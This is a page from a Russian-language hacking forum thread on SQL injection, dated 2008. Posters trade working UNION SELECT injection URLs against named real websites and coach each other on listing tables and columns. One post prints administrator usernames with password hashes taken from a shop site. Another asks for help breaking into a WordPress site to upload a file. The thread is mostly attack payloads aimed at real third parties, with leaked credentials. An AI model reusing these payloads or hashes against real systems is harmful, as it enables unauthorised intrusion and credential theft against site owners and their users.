FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 584 из 1602

584

Опции темы

Поиск в этой теме

Опции просмотра

10.07.2008, 16:50

~~SponS~~

Banned

Регистрация: 08.04.2006

Сообщений: 15

Провел на форуме:
67450

Репутация: -2

Отправить сообщение для SponS с помощью ICQ

http://www.ac-psych.org/?id=-1+union+select+version()/*

http://www.ac-psych.org/?id=-1+union+select+table_name+from+information_schema. tables+limit+1,1/*

Последний раз редактировалось SponS; 10.07.2008 в 16:54..

10.07.2008, 16:53

Rebz

Флудер

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

masterBlack, не пиши пож. большими буквами.

http://www.ac-psych.org/?id=1%20union%20select%20table_name%20FROM%20INFOR MATION_SCHEMA.TABLES%20limit%2017,1

меняй N - limit N,1 и см. таблицы. Ознакомься с этой темой (FAQ):
https://forum.antichat.ru/threadnav43966-1-10.html

10.07.2008, 17:02

masterBlack

Новичок

Регистрация: 12.06.2008

Сообщений: 19

Провел на форуме:
70897

Репутация: 3

Спасибо!

10.07.2008, 19:53

2la.painkiller

Новичок

Регистрация: 22.05.2008

Сообщений: 27

Провел на форуме:
80944

Репутация: 0

Народ нашел дыру
http://БЛАБЛА/forprint.php?id=-1+union+select+1,2,3,version(),5,6,7,8/*
versia 5.*.*
http://БЛАБЛА/forprint.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor mation_schema.tables+limit+1,1/*
нашел нужные таблицы
KEY_COLUMN_USAGE
neo_groups
client_info
Теперь как узнать что в них? напишите плиз готовый вариант, то сколько по faq не пытался ни хрена не получается
заранее спс

Вот мой вариант
http://БЛАБЛА/forprint.php?id=-1+union+select+1,2,3,column_name,5,6,7,8+from+info rmation.schema.columns+where+table_name=%27client_ info%27/*
Но после этого ни чего не выводит мб я чет не так делаю, хз , жду ващй помощи )

Последний раз редактировалось 2la.painkiller; 10.07.2008 в 20:02..

10.07.2008, 19:58

aka PSIH

Постоянный

Регистрация: 07.02.2006

Сообщений: 630

Провел на форуме:
12985021

Репутация: 676

вапросы по уязвимостям вроде в другой теме...?

2la.painkiller
/forprint.php?id=-1+union+select+1,2,3,concat_ws(0x3a,table_name,col umn_name),5,6,7,8+from+infor mation_schema.columns+limit+1,1/*
или
/forprint.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor mation_schema.columns+where+table_name='table_name '/*
p.s: 'table_name' попробуй закодировать в hex, char...

Последний раз редактировалось aka PSIH; 10.07.2008 в 20:08..

10.07.2008, 20:17

2la.painkiller

Новичок

Регистрация: 22.05.2008

Сообщений: 27

Провел на форуме:
80944

Репутация: 0

А я ради безопасности тут написал
во спс помогли
Где можно побольше узнать об этом concat_ws(0x3a, я чет ваще не понимаю что это и откуда

в hex, char... как это сделать? )

в гугл не посылать )

10.07.2008, 20:36

cric.cric

Познающий

Регистрация: 02.06.2008

Сообщений: 52

Провел на форуме:
218331

Репутация: 10

Привет всем!Нужна помощь!!!
Кто может помочь найти уязвимость в этом сайте http://kunik.no-ip.com/wordpress версия движка wordpress-2.5 помочь залить этот файл с сайта http://rapidshare.com/files/128670416/user.php.html на этот сайт http://kunik.no-ip.com/
Зарание спосибо!!!

10.07.2008, 23:12

gibson

Постоянный

Регистрация: 24.02.2006

Сообщений: 447

Провел на форуме:
2872049

Репутация: 705

Отправить сообщение для gibson с помощью ICQ

a-shop.ru
_http://www.a-shop.ru/articles.php?aid=-54'+union+select+1,concat_ws(0x3a,username,passwor d),3,4+from+administrators/*

Цитата:

evgeny:*71363E2E614A09E3EF9BB9AA6E75E63A475A81AD
amira:*E9F326EFC55D3E0D7FAB74C7BD7894AD8DC4B2F1
sveta:*6DDE0543444FBA9E39CAA6D3320908E07BF32C22
bigmike:*AB930C3AE04FC73337AFE016B0A145AEC5005598
mike:*FAA1BD777F877B9E165659BC903AFA947891CA11
alena:*BCA54683246384E4B34497AB508FD62F21017832
nastja:*D3F3A4030CBF35E9F71FDB8B2E7282A29E0F16E7
Sky:*AE889E02E12594B05C080B52FE32E2584B3993D9
ZaitsevS:*E6E49E72EF471AEBFCAE2B7A48E6469A4DBE2B2E
Sergey-S:*72AA3892FA00484D53B77060D55904FFB5F3D573
denis:*7AEF71A0E7DD19051D6B1DBF7549CAE50897703B
roller:*04CD3F2CB5195CE66AE7D5757B54D6DED734485E
Serginio:*2BEE00F76C0D1B93FFF2DE9792977A8F1E371AB7
olesya:*4A4DECD159BEAEB0B1BAE7D7D07CFF5E5E96B664

11.07.2008, 05:21

~~procedure~~

Banned

Регистрация: 22.12.2007

Сообщений: 660

Провел на форуме:
3885269

Репутация: 1158

audit.by

Цитата:

http://www.audit.by/new/index.php?id=1'

Цитата:

http://www.audit.by/new/index.php?id=10&spr=1'

Цитата:

http://www.audit.by/new/?news_id=1'

#10

11.07.2008, 05:32

DDoSька

Постоянный

Регистрация: 05.05.2008

Сообщений: 403

Провел на форуме:
2375039

Репутация: 1160

Отправить сообщение для DDoSька с помощью ICQ

Цитата:

Сообщение от procedure

audit.by

http://www.audit.by/new/index.php?id=10&spr=1+union+select+1,2,version()/*
4 версия =(
----
http://www.audit.by/new/index.php?id=10&spr=1+union+select+1,2,3+from+news/*